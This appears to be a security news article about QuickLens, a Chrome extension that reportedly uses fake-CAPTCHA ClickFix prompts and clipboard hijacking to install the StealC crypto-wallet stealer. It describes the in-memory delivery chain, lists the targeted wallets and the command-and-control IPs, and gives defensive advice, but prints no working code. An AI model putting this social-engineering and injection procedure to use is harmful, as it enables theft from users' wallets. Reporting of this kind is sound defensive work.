QuickLens Chrome Extension Steals Crypto via ClickFix

Security researchers have flagged QuickLens, a Chrome browser extension masquerading as a Google Lens integration tool, as a delivery mechanism for cryptocurrency-stealing malware. The extension combines legitimate visual search functionality with the ClickFix social engineering technique to drain victims' crypto wallets.

The campaign represents another evolution in ClickFix tradecraft, which has become the go-to method for bypassing security tools by convincing users to run malicious commands themselves.

How QuickLens Operates

QuickLens advertises itself as a utility for visual searches—selecting images, searching YouTube frames, and integrating Amazon product lookup. The legitimate features work as described, which helps the extension maintain a veneer of credibility and avoid immediate removal reports.

The malicious behavior triggers under specific conditions. After installation, the extension monitors browsing activity for cryptocurrency-related sites. When users visit exchanges, wallet interfaces, or DeFi platforms, QuickLens activates its payload delivery mechanism.

The attack follows the standard ClickFix playbook documented by LevelBlue's SpiderLabs research team. Users encounter what appears to be a Cloudflare-style verification prompt claiming they need to confirm they're human. The fake CAPTCHA instructs victims to:

1. Press Win+R to open the Run dialog
2. Press Ctrl+V to paste a command
3. Press Enter to execute

What users don't realize: QuickLens has already copied a malicious PowerShell command to their clipboard. The command looks technical enough to seem legitimate but downloads and executes the StealC information stealer.

What Gets Stolen

StealC specifically targets cryptocurrency assets across multiple vectors. According to Hackread's analysis, the malware harvests credentials from over 50 browser-based wallet extensions by accessing their local storage directories.

Primary targets include:

• MetaMask - private keys and vault data
• Phantom - Solana wallet credentials
• Coinbase Wallet - authentication tokens
• Trust Wallet - seed phrases and configuration
• Exodus - wallet backup files
• Atomic Wallet - encrypted keystore data

Beyond browser extensions, StealC also sweeps desktop wallet applications including Electrum, Bitcoin Core, Ethereum Wallet, and Monero GUI. The malware extracts seed phrases, private keys, wallet passwords, and transaction history—everything needed for complete asset theft.

Browser credentials get harvested too. Chromium-based browsers store passwords in encrypted databases that StealC decrypts using Windows DPAPI. Firefox profiles get targeted separately through NSS3.dll library calls.

Technical Delivery Chain

The infection follows a four-stage process designed to evade detection:

Stage 1: The clipboard-hijacked PowerShell command connects to attacker infrastructure at a rotating set of IP addresses. CyberProof researchers identified several command-and-control servers including 91.92.240.219, 94.154.35.115, and 178.16.53.70.

Stage 2: A loader script performs in-memory shellcode injection using Windows API calls—VirtualAlloc for memory allocation, CreateThread for execution. No disk artifacts get written at this stage.

Stage 3: Donut framework shellcode loads a 64-bit PE downloader that fetches the final StealC payload.

Stage 4: StealC injects itself into a spoofed svchost.exe process and begins data collection.

The entire chain operates in memory where possible, making forensic recovery difficult. Microsoft Defender has flagged samples as Behavior:Win32/SuspClickFix.C.

Browser Extension Permissions Abuse

What makes QuickLens particularly dangerous is its permission scope. The extension requests access to browser storage, clipboard operations, and cross-origin requests—all permissions that legitimate visual search tools might reasonably need.

These same permissions enable the malicious functionality. Storage access allows monitoring wallet extension data. Clipboard manipulation enables the ClickFix paste attack. Network permissions let the extension communicate with external infrastructure.

This attack pattern mirrors what we covered when Chrome extensions targeted Meta Business accounts—legitimate-seeming tools that weaponize standard browser APIs.

Connection to Broader Campaign

QuickLens doesn't appear to be an isolated incident. The infrastructure overlaps with previous ClickFix campaigns that deployed Amatera stealer through App-V abuse. Attackers continue iterating on the core technique while swapping delivery mechanisms and payloads.

Chrome's recent WebView security bypass may have provided additional attack surface for extensions operating outside normal sandbox restrictions.

The cryptocurrency sector has faced sustained targeting. Last month's CrossCurve bridge exploit demonstrated that attackers pursue crypto assets through every available vector—smart contract vulnerabilities, phishing, malicious extensions, and social engineering.

Protecting Yourself

Extensions represent a significant attack surface that many users overlook. Consider these defensive measures:

Audit installed extensions regularly. Chrome's extension management page (chrome://extensions) shows all installed add-ons. Remove anything you don't actively use or don't remember installing.

Check extension permissions. Click "Details" on any extension to review its permissions. Visual search tools shouldn't need clipboard access or broad network permissions.

Use hardware wallets. Software wallets—whether browser extensions or desktop applications—store keys on your computer. Hardware wallets keep private keys on isolated devices that malware can't access.

Verify extension publishers. Before installing, check the developer name, number of users, and reviews. QuickLens had mixed reviews with some users reporting suspicious behavior before the malware connection was confirmed.

Never run commands from popups. No legitimate service asks you to open Run, paste commands, and execute them. This is always an attack.

Organizations managing crypto assets should consider browser isolation and extension whitelisting. Endpoint detection rules can flag clipboard hijacking and PowerShell invocations from browser processes.

Why This Matters

The ClickFix technique works because it bypasses technical security controls entirely. Users execute the payload themselves, making traditional exploit detection useless.

Browser extensions remain an undermonitored attack vector despite Google's Manifest V3 restrictions. Legitimate functionality can coexist with malicious code, and reviews alone can't catch sophisticated threats.

For cryptocurrency holders, the stakes are particularly high. Unlike traditional financial theft, crypto transactions are irreversible. Once assets leave your wallet, there's no chargeback or fraud protection. Prevention is the only viable defense.

Users who installed QuickLens should immediately uninstall the extension, scan their systems for malware, and consider any wallet credentials stored on that machine compromised. Moving assets to fresh wallets generated on clean devices is the safest approach.